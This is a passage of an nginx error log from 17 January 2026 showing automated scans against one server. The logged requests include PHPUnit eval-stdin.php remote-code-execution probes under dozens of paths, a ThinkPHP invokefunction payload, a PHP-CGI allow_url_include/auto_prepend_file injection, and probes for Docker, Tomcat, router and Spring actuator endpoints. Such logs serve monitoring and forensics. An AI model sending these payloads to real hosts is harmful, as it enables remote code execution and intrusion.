"/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:42 [error] 378#378: *249456 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:42 [error] 378#378: *249456 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:42 [error] 378#378: *249456 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:42 [error] 378#378: *249456 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:43 [error] 378#378: *249456 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:43 [error] 378#378: *249456 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:43 [error] 378#378: *249456 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:43 [error] 378#378: *249456 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:44 [error] 378#378: *249456 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:44 [error] 378#378: *249456 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:44 [error] 378#378: *249456 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:44 [error] 378#378: *249456 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:45 [error] 378#378: *249456 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:45 [error] 378#378: *249456 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:45 [error] 378#378: *249456 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:45 [error] 378#378: *249456 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:46 [error] 378#378: *249456 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:46 [error] 378#378: *249456 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:46 [error] 378#378: *249456 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:46 [error] 378#378: *249456 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:47 [error] 378#378: *249456 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:21:36 [error] 378#378: *249466 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208" +2026/01/17 19:57:21 [error] 379#379: *249496 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:22 [error] 379#379: *249496 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:22 [error] 379#379: *249496 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:23 [error] 379#379: *249496 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:23 [error] 379#379: *249496 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:24 [error] 379#379: *249496 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:24 [error] 379#379: *249496 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:24 [error] 379#379: *249496 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:25 [error] 379#379: *249496 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:25 [error] 379#379: *249496 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:25 [error] 379#379: *249496 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:26 [error] 379#379: *249496 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:26 [error] 379#379: *249496 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:26 [error] 379#379: *249496 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:27 [error] 379#379: *249496 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:27 [error] 379#379: *249496 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:28 [error] 379#379: *249496 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:28 [error] 379#379: *249496 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:29 [error] 379#379: *249496 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:29 [error] 379#379: *249496 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:29 [error] 379#379: *249496 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:30 [error] 379#379: *249496 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:30 [error] 379#379: *249496 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:31 [error] 379#379: *249496 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:31 [error] 379#379: *249496 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:31 [error] 379#379: *249496 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:32 [error] 379#379: *249496 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:32 [error] 379#379: *249496 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:32 [error] 379#379: *249496 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:33 [error] 379#379: *249496 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:33 [error] 379#379: *249496 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:34 [error] 379#379: *249496 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:34 [error] 379#379: *249496 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:35 [error] 379#379: *249496 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:35 [error] 379#379: *249496 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:36 [error] 379#379: *249496 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:36 [error] 379#379: *249496 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:37 [error] 379#379: *249496 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:37 [error] 379#379: *249496 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:37 [error] 379#379: *249496 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:57:38 [error] 379#379: *249496 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 134.65.30.157, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 20:05:08 [error] 379#379: *249503 open() "/var/www/html/manager/html" failed (2: No such file or directory), client: 20.65.195.59, server: localhost-nginx-proxy-manager, request: "GET /manager/html HTTP/1.1", host: "91.82.83.208" +2026/01/17 20:38:08 [error] 379#379: *249531 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 103.93.93.211, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" +2026/01/17 20:53:08 [error] 380#380: *249546 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:33:46 [error] 380#380: *249578 open() "/var/www/html/dispatch.asp" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "GET /dispatch.asp HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:29 [error] 380#380: *249586 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET 